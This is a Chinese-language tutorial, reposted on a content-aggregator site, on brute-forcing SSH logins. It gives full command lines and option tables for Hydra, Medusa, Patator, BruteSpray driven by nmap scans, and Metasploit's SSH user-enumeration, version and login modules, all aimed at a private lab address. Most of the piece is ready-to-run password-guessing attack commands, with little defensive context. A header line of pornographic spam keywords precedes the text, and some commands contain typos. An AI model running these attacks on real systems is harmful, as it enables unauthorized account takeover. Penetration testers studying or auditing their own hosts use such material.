日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

SSH暴力破解实战

發布時間:2023/12/2 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SSH暴力破解实战 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一.hydra【海德拉】

海德拉(Hydra):希臘神話中的九頭蛇,是西方的神話生物,在古希臘神話中出現最為頻繁。傳說它擁有九顆頭,其中一顆頭要是被斬斷,立刻又會生出兩顆頭來。
Hydra是世界頂級密碼暴力破解工具,支持幾乎所有協議的在線密碼破解,功能強大,其密碼能否被破解關鍵取決于破解字典是否足夠強大,在網絡安全滲透過程中是一款必備的測試工具。

1.指定用戶破解:

hydea -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.1680.0/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -p pws.txt -M targets.txt ssh hydra -l root -P pass.list 192.168.75.158 ssh

    2.用戶列表破解:

    hydra -L userlist.txt -P passlist.txt 192.168.75.158 ssh hydra -L userlist.txt -P passlist.txt -M hostlist.txt ssh hydra -l root -P pass.list 192.168.75.158 ssh -o hydrassh.txt

    二.medusa[美杜莎]

    美杜莎是希臘神話里的一個女妖怪,她的頭發是毒蛇,長的青面獠牙,她知道自丑,她要報復,她把見過她的人都變成了石頭。據說她原是一位美麗的少女,之所以變成蛇發女妖是因為梅杜莎和智慧女神雅典娜比美,雅典娜一怒之下將梅杜莎的頭發變成毒蛇,變成面目丑陋的怪物。
    Medusa[美杜莎]是一個速度快,支持大規模并行,模塊化,爆破登錄。可以同時對多個主機、用戶或密碼執行強力測試。Medusa和Hydra一樣,同樣于在線密碼破解工具。不同的是,Medusa的穩定性相較于Hydra要好很多,但其支持模塊要比Hydra少一些。
    Medusa [ -h host | -H file] [ -u username | -U file] [-p password | -p file ] [ -C file ]

    選項功能說明
    -h [TEXT]目標主機名稱或者IP地址
    -H [FILE]包含目標主機名稱或者IP地址文件
    -u [TEXT]測試的用戶名
    -U [FILE]包含測試的用戶名文件
    -p [TEXT]測試的密碼
    -P [FILE]包含測試的密碼文件
    -C [FILE]組合條目文件
    -O [FILE]日志信息文件
    -e [n/s/ns]n代表空密碼,s代表為密碼與用戶名相同
    -M [TEXT]模塊執行名稱
    -m [TEXT]傳遞參數到模塊
    -d顯示所有的模塊名稱
    -n [NUM]使用非默認Tcp端口
    -s啟用SSl
    -r [NUM]重試間隔時間,默認未3秒
    -t [NUM]設定線程數量
    -T同時測試的主機總數
    -L并行化,每個用戶使用一個線程
    -f在任何主機上找到第一個賬號/密碼后,停止破解
    -F在任何主機上找到第一個有效的用戶名/密碼后停止審計
    -q顯示模塊的使用信息
    -v [NUM]詳細級別(0-6)
    -w [NUM]錯誤調試級別(0-10)
    -V顯示版本
    -Z [TEXT]繼續掃描上一次

    medusa -M ssh -u root -P pass.list -h 192.168.75.158
    medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt
    medusa -M ssh -u root -P pass.list -h 192.168.75.158 -O medusa.txt

    三.Patator強大的命令行暴力破解器

    查看模塊: #patator
    查看模塊具體用法:#patator --ssh_login --help
    #patator ssh_login host=192.168.75.158 user=root password=FILE0 0=passlist.txt
    #patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list
    #patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list -x ignore:mesg=‘Authentication failed.’

    四.BrutesPray

    BrutesPray是一款基于nmap掃描輸出的gnmap/XML文件。自動調用Medusa對服務進行爆破。

    1.安裝brutespray

    #apt-get update
    #apt-get install brutespray

    2.語法參數:

    選項功能說明
    -f或 --flie接一個文件名, 解析nmap輸出的 GNMAP 或者 XML 文件
    -s或 --service 接一個服務名, 指定要攻擊的服務
    -t 或 --threads接一數值,指定線程數
    -T 或 --hosts接一數值,指定同時測試的主機數
    -U 或 --userlist 接一個用戶字典文件
    -P 或 --passlist 接一個密碼字典文件
    -u 或 --username接用戶名,指定一個用戶名進行爆破
    -p 或 --password接一個密碼,指定一個密碼進行爆破
    -c 或 --continuous 成功之后繼續爆破
    -I 或 --interactive 交互模式

    3.Nmap掃描常用命令

    命令功能說明
    nmap -ip地址
    nmap -v ip地址顯示掃描過程
    nmap -p80,8080指定端口掃描
    nmap -A ip綜合掃描
    nmap -O ip掃描主機操作系統
    nmap -iL 文件掃描指定文件中的IP
    nmap -sS SYN掃描使用SYN半開放掃描
    nmap -sT TCP掃描掃描開放了TCP端口的設備
    nmap -F快速掃描
    nmap -sV版本檢測 用于掃描目標主機服務版本號. 探測打開的端口以確定服務/版本信息
    nmap -sRRPC掃描
    nmap -sU探測那些UDP端口開放
    nmap -sO用于判斷目標主機上使用的是神魔協議 探測目標主機支持哪些IP協議
    nmap -oX表示以xml的格式輸出結果到以文件
    -P0跳過ping的探測,可以加快掃描速度.
    -sPping掃描
    -T [0-6]設置定時模板(越高越快)

    4.對SSH密碼進行爆破

    #nmap -sV -p 22 192.168.75.0/24 -oX nmaplive.xml #brutespray --file nmaplive.xml -u root -P pass.list -c #cat /root/brutespray-output/22-ssh-success.txt 查看爆破成功的文件內容

      五.Metasploit Framework

      Metasploit Framework(簡稱MSF)是一個編寫、測試和使用exploit代碼的完善環境。這個環境為滲透測試,Shellcode編寫和漏洞研究提供了一個可靠的平臺,這個框架主要是由面向對象的Perl編程語言編寫的,并帶有由C語言,匯編程序和Python編寫的可選組件。
      #msfconsole
      msf > search ssh

      1.MSF枚舉(找用戶)

      msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > show options msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.75.158 設置目標主機 msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file /root/user.list msf auxiliary(scanner/ssh/ssh_enumusers) > set threads 10 msf auxiliary(scanner/ssh/ssh_enumusers) > show options msf auxiliary(scanner/ssh/ssh_enumusers) > run

        2.MSF版本探測

        msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > show options msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.75.158 msf auxiliary(scanner/ssh/ssh_version) > show options msf auxiliary(scanner/ssh/ssh_version) > run

          3.MSF暴力破解

          msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login msf auxiliary(scanner/ssh/ssh_login) > show options msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.75.158 msf auxiliary(scanner/ssh/ssh_login) > set pass_file /root/pass.list msf auxiliary(scanner/ssh/ssh_login) > set user_file /root/user.list msf auxiliary(scanner/ssh/ssh_login) > run

          總結

          以上是生活随笔為你收集整理的SSH暴力破解实战的全部內容,希望文章能夠幫你解決所遇到的問題。

          如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。